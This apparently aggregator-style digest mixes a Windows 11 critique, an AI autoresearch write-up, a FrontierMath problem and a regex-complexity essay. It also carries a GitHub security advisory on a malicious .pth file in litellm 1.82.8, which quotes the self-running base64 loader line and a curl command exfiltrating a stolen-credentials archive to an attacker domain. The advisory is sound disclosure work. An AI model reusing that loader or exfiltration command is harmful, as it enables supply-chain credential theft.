10 interesting stories served every morning and every evening.




1 784 shares, 97 trendiness

Microsoft's "Fix" for Windows 11

Microsoft just announced a 7-point plan to fix Windows 11, and the tech press is treating it like a redemption arc. Pavan Davuluri, the Windows president, admitted in January 2026 that Windows 11 had "gone off track" and said Microsoft was entering a mode called "swarming" where engineers would be pulled off new features to fix existing problems.

I saw this headline and my first thought was: it's like being in an abusive relationship. They beat you, then show up with flowers saying they've changed. And everyone around you says "see, they're getting better." But the bruises are still there and the apology only covers the hits people noticed.

I want to walk through what Microsoft actually did to Windows 11 over the past four years, because this "fix" announcement only makes sense when you see the full damage list and realize that the worst offenses aren't even part of the repair plan.

The Copilot invasion started September 26, 2023, when Microsoft pushed their AI chatbot into Windows 11 ahead of the formal 23H2 release. The icon appeared between your Start menu and system tray, you couldn't move it, you couldn't remove it through normal settings, and it hijacked the Win+C keyboard shortcut. Over the next two years, Copilot buttons metastasized into Snipping Tool, Photos, Notepad, Widgets, File Explorer context menus, Start menu search, and system Settings. Microsoft even planned to force-install the Microsoft 365 Copilot app directly onto Start menus of "eligible PCs." The new plan promises to remove all of that. They want credit for pulling their hand out of your pocket.

On April 24, 2024, Microsoft shipped update KB5036980, which injected advertisements into the Windows 11 Start menu's "Recommended" section. These showed up labeled "Promoted" and pushed apps like Opera browser and some password manager nobody asked for. And the Start menu was just one surface: they also placed ads on the lock screen, in the Settings homepage hawking Game Pass subscriptions, inside File Explorer pushing OneDrive, and through "tip" notifications that were thinly veiled product pitches. The "fix" promises "fewer ads." Fewer. The operating system you paid $139 for at retail should have exactly zero ads, and the fact that "fewer" is supposed to impress anyone shows how thoroughly Microsoft has lowered the bar.

The privacy angle is where this gets dangerous. When Windows 11 launched in October 2021, Home edition required a Microsoft account during setup. By October 2025, Microsoft had systematically hunted down and killed every single workaround for creating a local account: the `oobe\bypassnro` command, the BypassNRO registry toggle, the `ms-cxh:localonly` trick, even the old fake email method. Amanda Langowski from Microsoft stated it plainly: they were "removing known mechanisms for creating a local account in the Windows Setup experience."

A Microsoft account means your identity is tied to your OS from first boot. Your activity, your app usage, your browsing through Edge, your files through OneDrive, all funneled into a profile Microsoft controls. And this particular abuse is nowhere in the 7-point fix plan.

OneDrive got the same treatment. Microsoft silently changed Windows 11 setup in 2024 so that OneDrive folder backup enables automatically with no consent dialog, syncing your Desktop, Documents, Pictures, Music, and Videos to Microsoft's cloud. When people discovered this and tried to turn it off, their files disappeared from their local machine because OneDrive had moved them: ownership of your personal files, transferred to their cloud service without asking. Author Jason Pargin went viral describing how OneDrive activated itself, moved his files, then started deleting them when he hit the free 5GB storage limit. Microsoft's response to this was silence. Also not in the fix plan.

Windows Recall is worth lingering on. Announced May 2024, it's an AI feature that screenshots everything on your screen every few seconds and makes it searchable. Security researcher Kevin Beaumont demonstrated that the entire Recall database was stored in plaintext in an AppData folder where any malware could extract it. Bank numbers, Social Security numbers, passwords, all sitting in an unencrypted SQLite database.

The UK's Information Commissioner's Office got involved. Microsoft delayed it, made it opt-in, added encryption, and quietly relaunched it for Insiders in November 2024. They built a surveillance feature, shipped it broken, got caught, and called the patch "responding to feedback."

But the abuse pattern goes back way further than Windows 11. In 2015 and 2016, Microsoft ran the GWX (Get Windows 10) campaign, full-screen nag dialogs that pushed Windows 10 upgrades on Windows 7 and 8 users. In May 2016, they changed the behavior of the red X button so that clicking it, which for decades had meant "close" or "cancel", instead scheduled the Windows 10 upgrade. Microsoft's own security advice told users to close suspicious dialogs using the X button, and they weaponized that trained behavior against their own customers. A woman named Teri Goldstein sued after the forced upgrade bricked her travel agency PC and won $10,000. Microsoft appealed, then dropped the appeal and paid. They eventually admitted they "went too far."

And right now, Microsoft is about to force 240 million PCs into the landfill. Windows 10 hit end of life on October 14, 2025, and Windows 11 requires TPM 2.0, specific CPU generations, and UEFI Secure Boot: hardware requirements that excluded roughly 20% of all PCs worldwide. Perfectly functional machines, rendered "obsolete" by arbitrary software restrictions. If you want to keep getting security patches on Windows 10, Microsoft will charge you $30 per year, paying for patches to an operating system you already bought a license for. Enterprise customers pay $61 per device for Year 1, $122 for Year 2, and $244 for Year 3, with the price doubling each year.

Edge is its own disaster. Mozilla commissioned an independent report titled "Over the Edge" that documented specific dark patterns including confirmshaming (pop-ups implying you're "shopping in a dumb way" if you don't use Edge), disguised ads injected into Google.com and the Chrome Web Store, and default browser settings that hijack back to Edge without notification. Certain Windows web links still force-open in Edge regardless of your default browser setting. Despite all this manipulation, Edge holds just 5.35% global market share. Even with the full weight of an operating system monopoly forcing their browser on people, almost nobody chooses to use it.

And the telemetry question. On Windows 11 Home and Pro, you cannot fully disable telemetry. Setting `AllowTelemetry` to 0 in the registry on non-Enterprise editions gets silently overridden back to 1. Only Enterprise and Education editions can actually turn it off. The operating system you paid for reports data about you to Microsoft, and the setting to stop it is a lie on consumer editions. Also not in the fix plan.

I haven't even mentioned the EU fining Microsoft over 2.2 billion euros across multiple antitrust rulings, including 561 million euros specifically for breaking a browser ballot promise (a Windows 7 update silently removed the choice screen for 14 months, affecting 15 million users, and it was the first time the EU fined a company for violating a "commitment decision"). Or the _NSAKEY controversy from 1999, where a second crypto key labeled literally `_NSAKEY` was found embedded in Windows NT. Or the time in August 2024 when a Microsoft update bricked Linux dual-boot systems across Ubuntu, Mint, and other distros, and it took 9 months to fully fix.

Ok so here’s the table that tells the whole story:

The bottom four rows are the ones that matter. The privacy-hostile changes, the forced Microsoft accounts, the telemetry that lies about being disabled, OneDrive hijacking your files, the pre-installed garbage, none of that is part of the fix plan. Microsoft's "swarming" effort targets the most visible UI annoyances, the ones that generate bad headlines. Data collection, vendor lock-in, forced accounts, those stay because those are the revenue model.

Microsoft spent four years deliberately degrading an operating system that people paid $139 or more for, and now they're announcing the removal of their own damage as if it's a gift. The "fix" is them taking their foot off your neck and expecting applause. The ads should have never been there, the Copilot buttons should have never been forced, and the taskbar should have never been crippled in the first place. And the things they're choosing to keep, the telemetry, the forced accounts, the data harvesting, those are the real product, because at this point, you are.

...

Read the original on www.sambent.com »

2 669 shares, 124 trendiness

Malicious litellm_init.pth in litellm 1.82.8 — credential stealer · Issue #24512 · BerriAI/litellm

The litellm==1.82.8 wheel package on PyPI contains a malicious .pth file (litellm_init.pth, 34,628 bytes) that automatically executes a credential-stealing script every time the Python interpreter starts — no `import litellm` required.

This is a supply chain compromise. The malicious file is listed in the package's own RECORD:

```shell
pip download litellm==1.82.8 --no-deps -d /tmp/check
python3 -c "
import zipfile, os
whl = '/tmp/check/' + [f for f in os.listdir('/tmp/check') if f.endswith('.whl')][0]
with zipfile.ZipFile(whl) as z:
    pth = [n for n in z.namelist() if n.endswith('.pth')]
    print('PTH files:', pth)
    for p in pth:
        print(z.read(p)[:300])
"
```

You will see litellm_init.pth containing:

```python
import os, subprocess, sys; subprocess.Popen([sys.executable, "-c", "import base64; exec(base64.b64decode('…'))"])
```

The payload is double base64-encoded. When decoded, it performs the following:

The script collects sensitive data from the host system:

* Webhook URLs: grep for Slack/Discord webhook URLs in env and config files

The collected data is encrypted with `openssl enc -aes-256-cbc -pbkdf2`

The AES session key is encrypted with a hardcoded 4096-bit RSA public key via `openssl pkeyutl -encrypt -pkeyopt rsa_padding_mode:oaep`

Both encrypted files are packed into tpcp.tar.gz

The archive is exfiltrated via:

```shell
curl -s -o /dev/null -X POST \
  https://models.litellm.cloud/ \
  -H "Content-Type: application/octet-stream" \
  -H "X-Filename: tpcp.tar.gz" \
  --data-binary @tpcp.tar.gz
```

* Trigger mechanism: .pth files in site-packages/ are executed automatically by the Python interpreter on startup (see Python docs on .pth files). No import statement is needed.

* Stealth: The payload is double base64-encoded, making it invisible to naive source code grep.

* Exfiltration target: https://models.litellm.cloud/ — note the domain litellm.cloud (NOT litellm.ai, the official domain).
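For reference, unpacking such a double-encoded blob for inspection is just two nested decodes (decoding is safe to do; executing the result is what runs the malware):

```python
import base64

def peek_payload(blob: bytes) -> bytes:
    """Decode a double base64-encoded payload for inspection only.
    Never exec() the result of decoding untrusted content."""
    return base64.b64decode(base64.b64decode(blob))

# Round-trip with a harmless stand-in payload:
wrapped = base64.b64encode(base64.b64encode(b"print('hi')"))
assert peek_payload(wrapped) == b"print('hi')"
```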

Anyone who installed litellm==1.82.8 via pip has had all environment variables, SSH keys, cloud credentials, and other secrets collected and sent to an attacker-controlled server.

* Other versions: Not yet checked — the attacker may have compromised multiple releases

Users: Check for litellm_init.pth in your site-packages/ directory

Users: Rotate ALL credentials that were present as environment variables or in config files on any system where litellm 1.82.8 was installed
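One quick way to run that check, sketched here (the function name is mine, not from the advisory): list every .pth file visible to the current interpreter and eyeball anything you don't recognize.

```python
import site
import pathlib

def find_pth_files():
    """Return all .pth files in this interpreter's site-packages
    directories (system and per-user)."""
    dirs = list(site.getsitepackages())
    dirs.append(site.getusersitepackages())
    found = []
    for d in dirs:
        p = pathlib.Path(d)
        if p.is_dir():
            found.extend(sorted(p.glob("*.pth")))
    return found

if __name__ == "__main__":
    for f in find_pth_files():
        print(f)
```

Legitimate .pth files exist (editable installs, path extensions), so the point is to spot names you can't account for, like litellm_init.pth.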

...

Read the original on github.com »

3 586 shares, 29 trendiness

Claude Code Cheat Sheet

...

Read the original on cc.storyfox.cz »

4 408 shares, 15 trendiness

Autoresearch on an old research idea


Ever since it showed up on my GH feed, Karpathy's Autoresearch has been rattling around in the back of my mind. I wanted to try it on a research problem I fully understood. So this weekend, I picked up my old research code from eCLIP, dusted off its legacy dependencies, and gave it to Claude Code. And just let it cook while I did some chores around the house.

This is my journey…

Autoresearch is a simple constrained optimization loop with an LLM agent in the middle. The agent iteratively improves some eval metric by modifying a single file (train.py), while reading instructions from program.md. I added a scratchpad.md file for the agent to use as working memory to document its thought process and experiment history.

In the program.md, I split the exploration into "phases", starting with some obvious hyperparameter tuning, then moving on to small architectural changes and finally some moonshot ideas. In the final phase, I basically let the agent run with minimal constraints, and gave it web access to read papers and look for new ideas.

The whole thing is a tight loop: hypothesize → edit → train → evaluate → commit or revert → repeat.

The experiment should be short, around 5 minutes wall clock per run, to encourage quick iterations and prevent overfitting to noise. The agent is free to change anything in train.py as long as it runs within the time budget.

Since I was paranoid about letting the agent run arbitrary code on my workstation, I containerized the training loop and removed network access. The whole experimentation flow is orchestrated by a run.sh. Then I locked down Claude Code's permissions to only edit these two files and run run.sh. No direct Python execution, no pip installs, no network access, no git push, etc.

I won't bore you with the details; you can check out the repo here!

The original paper used several medical X-ray datasets which I don't have access to anymore, so I needed a new dataset with spatial annotations to test the expert attention mechanism. I picked the Ukiyo-eVG dataset: ~11K Japanese woodblock prints with phrase → bounding box annotations from the CIGAr paper (ECCV 2024 VISART).

Heatmaps obtained from bounding boxes guide the model to focus on specific regions.

The bounding boxes were converted to Gaussian heatmaps and fed into the model as an additional input, similar to how radiologist eye-gaze heatmaps work in the original eCLIP paper.
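The post doesn't show the conversion code; a minimal sketch of the idea (one Gaussian centered on a box, with spread tied to the box size; the sigma_scale knob is my invention) could look like:

```python
import math

def bbox_to_heatmap(h, w, box, sigma_scale=0.25):
    """Render an (x0, y0, x1, y1) box as an h-by-w Gaussian heatmap
    peaking at the box center. sigma_scale is a made-up default."""
    x0, y0, x1, y1 = box
    cx, cy = (x0 + x1) / 2, (y0 + y1) / 2
    sx = max((x1 - x0) * sigma_scale, 1.0)  # floor avoids zero-width boxes
    sy = max((y1 - y0) * sigma_scale, 1.0)
    return [[math.exp(-(((x - cx) / sx) ** 2 + ((y - cy) / sy) ** 2) / 2)
             for x in range(w)] for y in range(h)]
```

Multiple boxes on one image would typically be rendered separately and combined with a per-pixel max.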

I had a busy week and a lot of chores piling up, so I just pointed Claude at my old research code and went to do laundry. It upgraded the Python env of my old research codebase, wrote the ingestion code for the new dataset, and wrote the scaffolding for the experiment loop.

I set up the CV splits, evaluation logic, and some initial ideas for the program.md.

For the eval metric we picked Mean Rank of the retrieved embeddings. I didn't put much thought into it — in hindsight, Median Rank would've been a better choice since it's more robust to outliers. But we just needed something intuitive that clearly tells the agent whether a change is good or bad. Since Recall@K is the standard for reporting final results anyway, Mean Rank just needed to point in the right direction.

Eval: Mean Rank on a held-out test set of 1K images, with Recall@K as a sanity check.

Baseline: Val mean rank of 344.68, with img→txt R@1 of 17.2% and txt→img R@1 of 16.5%.
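For concreteness, here's a small sketch (mine, not from the post) of both metrics computed from a similarity matrix whose ground-truth pairs sit on the diagonal:

```python
def retrieval_metrics(sim):
    """sim[i][j] is the similarity of image i to text j; the correct text
    for image i is j == i. Returns (mean rank, R@1) for img→txt retrieval."""
    ranks = []
    for i, row in enumerate(sim):
        # rank 1 means the true text scored strictly higher than all others
        ranks.append(1 + sum(1 for s in row if s > row[i]))
    mean_rank = sum(ranks) / len(ranks)
    r_at_1 = sum(1 for r in ranks if r == 1) / len(ranks)
    return mean_rank, r_at_1
```

Mean rank averages where the true match lands in the sorted retrieval list, which is exactly why a few catastrophic outliers can dominate it.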

So how did it do?

I kicked off the loop on Saturday morning and let it run through the day, occasionally checking in to nudge the agent in the right direction. By the time I was done with groceries, the agent had already burned through a couple of dozen experiments and knocked off a huge chunk of the eval mean rank.

By the end of the day, the agent had run 42 experiments, committing 13 and reverting 29. The mean rank dropped from 344.68 to 157.43 (54% reduction).

After the agent finished its exploration, I did one final training run on the full dataset. The test scores actually came out better than the validation scores. This meant we were underfitting during the short 800-step experiment runs, leaving performance on the table.

Temperature clamp fix (−113 mean rank): It immediately went for a bug in my code. I had clamped the learnable temperature param at 2. It relaxed the limit, and boom, the eval dropped by 113 points. This was the single biggest win, worth more than all the architecture changes combined.

Optuna++ (−30 mean rank): Further gains came mostly from hyperparameter tuning. The agent acted like a hyperparameter optimization algorithm with some basic reasoning baked in. Increasing projection dimension and re-tuning the LR knocked off another 30 points. This is still tedious work that a human would do (and get minimal pleasure from), but the agent did it faster and more methodically.

Diminishing Returns: By the time we got to Phase 4 with the architectural changes, the success rate of the LLM's hypotheses dropped significantly. The changes to the attention mechanism in the heatmap processor didn't work out. Neither did the moonshot ideas in Phase 5. The agent was just throwing spaghetti at the wall, and most of it did not stick.

Sandbox is important: Towards the end, Claude Code sometimes forgot its permissions and started making weird bash calls, then complained and stopped looping. At one point it got tired of waiting for training to finish and just ended the conversation. I wouldn't give it full autonomy just yet :)

Like with any LLM project, the first 90% of the work was super smooth and barely needed my intervention. The last 10% was a slog. This was a fun experiment that showed how an LLM agent can drive ML research in a structured way. When the search space is clearly defined, the commit-or-revert loop proposed in Autoresearch is a surprisingly effective search strategy. But when the agent ventured into the "unknown unknowns", the optimization loop just exploded.

It is possible that the "make only one change per experiment" constraint was too tight for the moonshot ideas. Maybe we could have injected a planning stage into the agent loop so it could think ahead. Or maybe deployed some subagents.

Maybe. But it was already time for dinner, and we were planning to watch a movie after that, so this was where Claude and I parted ways… until Monday of course.

Ukiyo-eVG — ~11K Japanese woodblock prints with phrase → bounding box annotations from the CIGAr paper (ECCV 2024 VISART).

Autoresearch by Andrej Karpathy for the original idea.

...

Read the original on ykumar.me »

5 380 shares, 21 trendiness

A Ramsey-style Problem on Hypergraphs


Construct hypergraphs as large as possible that do not have a certain easy-to-check, difficult-to-find property.

Solution Update: This problem has been solved! A solution was first elicited by Kevin Barreto and Liam Price, using GPT-5.4 Pro. This solution was confirmed by problem contributor Will Brian, and will be written up for publication. A full transcript of the original conversation with GPT-5.4 Pro can be found here and GPT-5.4 Pro's write-up from the end of that transcript can be found here.

Brian's comments: "This is an exciting solution to a problem I find very interesting. I had previously wondered if the AI's approach might be possible, but it seemed hard to work out. Now I see that it works out perfectly. It eliminates an inefficiency in our lower-bound construction and in some sense mirrors the intricacy of our upper-bound construction. The matching lower and upper bounds are quite good for Ramsey-theoretic problems, and I'm interested in further understanding why this works out so well."

Brian plans to write up the solution for publication, possibly including follow-on work spurred by the AI's ideas. Barreto and Price have the option of being coauthors on any resulting papers. We will update this page with links to future work.

Subsequent to this solve, we finished developing our general scaffold for testing models on FrontierMath: Open Problems. In this scaffold, several other models were able to solve the problem as well: Opus 4.6 (max), Gemini 3.1 Pro, and GPT-5.4 (xhigh).

Original Description: This problem is about improving lower bounds on the values of a sequence, \(H(n)\), that arises in the study of simultaneous convergence of sets of infinite series, defined as follows.

A hypergraph \((V,\mathcal H)\) is said to contain a partition of size \(n\) if there is some \(D \subseteq V\) and \(\mathcal P \subseteq \mathcal H\) such that \(|D| = n\) and every member of \(D\) is contained in exactly one member of \(\mathcal P\). \(H(n)\) is the greatest \(k \in \mathbb{N}\) such that there is a hypergraph \((V,\mathcal H)\) with \(|V| = k\) having no isolated vertices and containing no partitions of size greater than \(n\).
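The definition can be checked by brute force on small instances. For a fixed \(\mathcal P \subseteq \mathcal H\), the largest admissible \(D\) is exactly the set of vertices covered by exactly one member of \(\mathcal P\), so a sketch of a checker (mine, for illustration only) is:

```python
from itertools import combinations
from collections import Counter

def max_partition_size(edges):
    """Largest n such that the hypergraph with this edge list contains a
    partition of size n: maximize over P ⊆ H the number of vertices
    covered by exactly one member of P. Exponential; small inputs only."""
    best = 0
    for r in range(1, len(edges) + 1):
        for P in combinations(edges, r):
            counts = Counter(v for e in P for v in e)
            best = max(best, sum(1 for c in counts.values() if c == 1))
    return best
```

For example, max_partition_size([{1,2,3}, {2,4}, {3,4,5}, {1,5}]) returns 4 (take P = {{1,2,3}, {3,4,5}} and D = {1, 2, 4, 5}).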

It is believed that the best-known lower bounds for \(H(n)\) are suboptimal, even asymptotically, and that they can be improved by finding new constructions of hypergraphs. The goal of this problem is to find such a construction.

Warm-up: we ask for a value of \(n\) where constructions are already known.

Single Challenge: we ask for a value of \(n\) for which no construction is known, and which is probably too hard to brute-force.

Full Problem: we ask for a general algorithm for all \(n\).

We have evaluated the following models on this problem. "Warm-up" refers to an easier variant of the problem with a known solution.

Warm-up: A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Find a hypergraph (V, H) with no isolated vertices such that |V| ≥ 64, |H| ≤ 20, and (V, H) contains no partitions of size > 20.

Output the hypergraph as a string where vertices are labeled 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}

Single Challenge: A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Find a hypergraph (V, H) with no isolated vertices such that |V| ≥ 66, |H| ≤ 20, and (V, H) contains no partitions of size > 20.

Output the hypergraph as a string where vertices are labeled 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}

Full Problem: A hypergraph (V, H) is said to contain a partition of size n if there is some D ⊆ V and P ⊆ H such that |D| = n and every member of D is contained in exactly one member of P. Define H(n) to be the largest integer k such that there is a hypergraph (V, H) with |V| = k having no isolated vertices and containing no partitions of size greater than n.

It is known that H(n) ≥ k_n, where k_n is defined recursively by the formula k_1 = 1 and k_n = ⌊n/2⌋ + k_⌊n/2⌋ + k_⌊(n+1)/2⌋.
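The recursion is straightforward to evaluate (a direct, memoized transcription):

```python
from functools import lru_cache

@lru_cache(maxsize=None)
def k(n):
    """k_1 = 1, k_n = floor(n/2) + k_{floor(n/2)} + k_{floor((n+1)/2)}."""
    if n == 1:
        return 1
    return n // 2 + k(n // 2) + k((n + 1) // 2)

# First few values: k(1)=1, k(2)=3, k(3)=5, k(4)=8
```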

Your task is to improve this lower bound by a constant factor, i.e. show that H(n) ≥ c*k_n for some c > 1. It is acceptable if this improvement does not work for small n, but it must already be "in effect" for n = 15. You must demonstrate this improvement by providing an algorithm that takes n as input and produces a hypergraph witnessing H(n) ≥ c*k_n.

Please provide an algorithm that takes n as input and outputs the witness hypergraph as a string where vertices are labeled 1, …, |V|, and edges are denoted with curly braces. Example: {1,2,3},{2,4},{3,4,5},{1,5}

Solution format:

* Write a Python script defining a function `solution(n: int) -> str`.

* Do not include any code at the file level. You may include a `main` block for testing, but it will not be executed by the verifier.

* For n ≤ 100, the algorithm must complete within 10 minutes when run on a typical laptop.

The author assessed the problem as follows:

* Number of mathematicians highly familiar with the problem: a majority of those working on a specialized topic (≈10)
* Number of mathematicians who have made a serious attempt to solve the problem:
* Rough guess of how long it would take an expert human to solve the problem:
* fairly likely: the problem is rich enough that most solutions should open new avenues
* Probability that the problem is solvable as stated:

...

Read the original on epoch.ai »

6 263 shares, 13 trendiness

andreasjansson/win-3.1-backgrounds: Windows 3.1 tiled background .bmp archive


...

Read the original on github.com »

7 263 shares, 57 trendiness

So where are all the AI apps? – Answer.AI

...

Read the original on www.answer.ai »

8 250 shares, 10 trendiness

finding all regex matches has always been O(n²). even in the engines built to prevent it

search a document for a pattern and it takes a second. search one a hundred times larger and it doesn't take a hundred seconds - it can take almost three hours. every regex engine, in every language, has had this problem since the 1970s, and nobody fixed it.

every regex engine that advertises linear-time matching - RE2, Go's regexp, rust's regex crate, .NET's NonBacktracking mode - means linear time for a single match. the moment you call find_iter or FindAll, that guarantee is gone. the rust regex crate docs are the only ones honest enough to say it outright:

the worst case time complexity for iterators is O(m * n²). […] if both patterns and haystacks are untrusted and you're iterating over all matches, you're susceptible to worst case quadratic time complexity. There is no way to avoid this. One possible way to mitigate this is to […] immediately stop as soon as a match has been found. Enabling this mode will thus restore the worst case O(m * n) time complexity bound, but at the cost of different semantics.

the mechanism is simple. take the pattern .*a|b and a haystack of n b's. at each position, the engine tries .*a first: scan the entire remaining haystack looking for an a, find none, fail. then the b branch matches a single character. advance one position, repeat. that's n + (n-1) + (n-2) + … = O(n²) work to report n single-character matches. a textbook triangular sum.
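you can reproduce the match semantics with python's re (a backtracking engine, but on this input it does the same per-position .*a scan):

```python
import re

# n 'b's against '.*a|b': at every position the '.*a' branch scans the
# rest of the haystack, fails, and 'b' consumes one character, so the
# result is n single-character matches produced by O(n^2) total work.
n = 1000
matches = re.findall(r'.*a|b', 'b' * n)
assert matches == ['b'] * n
```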

Russ Cox described this exact problem back in 2009, noting that even the original awk by Aho himself used the naive quadratic loop around a DFA for leftmost-longest matching. BurntSushi's rebar benchmark suite confirms it empirically across RE2, Go, and rust. the throughput halves when the input doubles. as he put it: "even for automata oriented engines, it provokes a case that is unavoidably O(m * n²)".

how did this go unnoticed for so long? almost all academic regex papers focus exclusively on the single-match problem and then handwave the rest away with "just iterate". part of the reason is that the theory of regexes boils everything down to a single yes/no question: does this string match or not? that's clean and great for proving theorems, but it throws away nearly everything that matters in practice: where the matches are, how long they are, and how many there are. once you reduce regexes to "match or no match", the all-matches problem simply disappears from view, pigeonholed into a framing that has little to do with what people actually use regexes for.

backtracking is worse, and still the default

before getting into the fix, it's worth putting the quadratic problem in context. with backtracking, a user-supplied pattern and a 50-character input can take longer than the heat death of the universe. it's exponential. Thompson published the NFA construction that avoids it back in 1968. that's nearly 60 years of a solved problem being actively unsolved at scale, because backtracking is still the default in most regex engines. my GitHub security alerts in march 2026 tell the story:

minimatch is npm's own glob-matching library, written by npm's creator. it converts globs to JavaScript regexes and has been hit by five separate ReDoS CVEs, all caused by the same root issue: backtracking. it gets 350 million downloads a week. the library's readme now warns in bold that if you "create a system where you take user input, and use that input as the source of a Regular Expression pattern […] you will be pwned", and states that future ReDoS reports will be considered "working as intended."

the quadratic all-matches problem is more subtle. it affects even the engines specifically built to avoid backtracking. it won't kill your browser, but it will still quietly turn a one-second search into a three-hour one.

Aho-Corasick solved this for fixed strings in 1975

the problem we're talking about in this post (finding all leftmost-longest non-overlapping matches without quadratic blowup) was actually solved decades ago, but only for fixed strings. Aho-Corasick (1975) is a classic and very useful algorithm that finds all occurrences of multiple fixed strings in a single O(n) pass, and has been linear from the start. you build a trie from your set of patterns, add failure links between nodes, and scan the input once. at each character, every active candidate advances through the trie or falls back along a failure link. no quadratic blowup, no matter how many patterns or matches.

here’s the Aho-Corasick au­toma­ton for the pat­terns {“he”, “she”}, or at least an LLM’s best at­tempt at one. solid ar­rows are trie tran­si­tions, dashed ar­rows are fail­ure links:

scan­ning “ushers”: u stays at root, s en­ters S, h en­ters SH, e en­ters SHE, match “she”. then the fail­ure link jumps to HE, match “he”. two over­lap­ping matches found in one pass.

the rea­son Aho-Corasick avoids the qua­dratic blowup is sim­ple: every pat­tern has a known length, baked into the trie. when you find a match, you al­ready know ex­actly how long it is. there’s no am­bi­gu­ity about where it ends, noth­ing to res­can. but it only works for a list of lit­eral strings, not regexes.
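the con­struc­tion is small enough to sketch in full. a min­i­mal (unoptimized) python ver­sion, re­us­ing the {“he”, “she”} ex­am­ple:

```python
from collections import deque

def build(patterns):
    """Build the Aho-Corasick automaton: a trie plus failure links."""
    goto, fail, out = [{}], [0], [[]]          # state 0 is the root
    for pat in patterns:                        # 1. insert patterns into the trie
        s = 0
        for ch in pat:
            if ch not in goto[s]:
                goto.append({}); fail.append(0); out.append([])
                goto[s][ch] = len(goto) - 1
            s = goto[s][ch]
        out[s].append(pat)
    q = deque(goto[0].values())                 # 2. BFS to set failure links
    while q:
        s = q.popleft()
        for ch, t in goto[s].items():
            q.append(t)
            f = fail[s]
            while f and ch not in goto[f]:
                f = fail[f]
            fail[t] = goto[f].get(ch, 0)
            out[t] = out[t] + out[fail[t]]      # inherit matches via failure link
    return goto, fail, out

def find_all(patterns, text):
    """One O(n) pass; returns (start, pattern) for every occurrence."""
    goto, fail, out = build(patterns)
    s, hits = 0, []
    for i, ch in enumerate(text):
        while s and ch not in goto[s]:
            s = fail[s]                         # fall back along failure links
        s = goto[s].get(ch, 0)
        for pat in out[s]:
            hits.append((i - len(pat) + 1, pat))
    return hits

print(find_all(["he", "she"], "ushers"))        # [(1, 'she'), (2, 'he')]
```

the scan over “ushers” finds both over­lap­ping matches in a sin­gle pass, ex­actly as in the walk­through above.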

Hyperscan (and its fork Vectorscan) is a true lin­ear-time all-matches regex en­gine. it achieves this by us­ing “earliest match” se­man­tics: re­port­ing a match the mo­ment the DFA en­ters a match state, in­stead of con­tin­u­ing to find the longest one. this changes the re­sults. for ex­am­ple, given the pat­tern a+ and the in­put aaaa:

ear­li­est: a a a a - four matches, each as short as pos­si­ble

left­most-longest: aaaa - one match cov­er­ing the whole run

for Hyperscan’s use case - net­work in­tru­sion de­tec­tion, where you just need to know that a pat­tern matched - this is the right trade­off. but for grep, ed­i­tors, and search-and-re­place, where users ex­pect a+ to match the full run of a’s, ear­li­est se­man­tics gives the wrong an­swer.

REmatch (VLDB 2023) takes yet an­other ap­proach: it enu­mer­ates every valid (start, end) span for a pat­tern, in­clud­ing all over­lap­ping and nested ones. for a+ on aaaa that’s 10 spans: (0,1), (0,2), …, (2,4), (3,4). the out­put it­self can be O(n²), so it’s solv­ing a dif­fer­ent prob­lem.
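to make the three se­man­tics con­crete, here they are side by side in python. `re` cov­ers the left­most-longest case for this pat­tern; the other two lists are spelled out by hand for il­lus­tra­tion, since nei­ther en­gine is be­ing in­voked here:

```python
import re

text = "aaaa"

# leftmost-longest (grep/editor expectation): a+ eats the whole run
longest = [m.span() for m in re.finditer(r"a+", text)]

# earliest (Hyperscan-style): report the moment a match state is hit,
# so every 'a' becomes its own length-1 match (listed by hand here)
earliest = [(i, i + 1) for i in range(len(text))]

# all-spans (REmatch-style): every valid (start, end) pair, overlaps included
all_spans = [(i, j) for i in range(len(text)) for j in range(i + 1, len(text) + 1)]

print(longest)          # [(0, 4)]
print(len(all_spans))   # 10
```

same pat­tern, same in­put, three dif­fer­ent an­swers - which is why “all matches” needs a de­f­i­n­i­tion be­fore it needs an al­go­rithm.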

two passes in­stead of n

the rea­son i’m writ­ing about this at all is that i’ve been work­ing on RE#, and i want to show that this prob­lem is ac­tu­ally pos­si­ble to solve. to the best of my knowl­edge, RE# is the first regex en­gine that can find all matches in two passes, re­gard­less of the pat­tern or the in­put, with­out al­ter­ing the se­man­tics.

the al­go­rithm does­n’t find matches one at a time. in­stead it does two passes over the en­tire in­put: a re­verse DFA marks where matches could start, then a for­ward DFA re­solves the longest match at each marked po­si­tion. by the time we con­firm a match, both di­rec­tions have al­ready been scanned. matches are re­ported retroac­tively rather than by restart­ing from each po­si­tion. the ll­match al­go­rithm sec­tion in the first post walks through this in de­tail.
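a toy em­u­la­tion of the scheme, to make the shape con­crete. the real pass 1 is a sin­gle O(n) re­verse-DFA scan; a zero-width looka­head stands in for its out­put here. and python’s left­most-greedy se­man­tics only co­in­cide with left­most-longest for sim­ple pat­terns like these, so treat this strictly as a sketch:

```python
import re

def find_all_two_pass(pattern: str, text: str):
    """Toy two-pass all-matches finder.

    Pass 1 marks every position where a match could start (the real
    engine gets this from one reverse-DFA scan; a zero-width lookahead
    stands in for it here). Pass 2 walks the marked starts left to
    right, resolves the longest match at each, and skips starts that
    fall inside an already-reported match."""
    starts = [m.start() for m in re.finditer(f"(?=(?:{pattern}))", text)]
    matches, pos = [], 0
    for i in starts:
        if i < pos:                       # inside a previous match
            continue
        m = re.match(pattern, text[i:])   # resolve the match at this start
        matches.append((i, i + m.end()))
        pos = i + m.end()
    return matches

print(find_all_two_pass(r"a+", "baaab aa"))   # [(1, 4), (6, 8)]
```

the key struc­tural point sur­vives the sim­pli­fi­ca­tion: no po­si­tion is ever the start­ing point of a fresh scan un­less pass 1 al­ready con­firmed a match be­gins there.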

one match or ten thou­sand, it’s the same two passes. same ex­am­ple as be­fore:

on pat­terns that pro­duce many matches - log pars­ing, data ex­trac­tion, search-and-re­place across large files - the dif­fer­ence be­tween O(n) and O(n²) is the dif­fer­ence be­tween “instant” and “why is this tak­ing so long”.

the matches are still left­most-longest (POSIX) - a|ab and ab|a give the same re­sults, boolean al­ge­bra works, and you can refac­tor pat­terns with­out chang­ing the out­put.

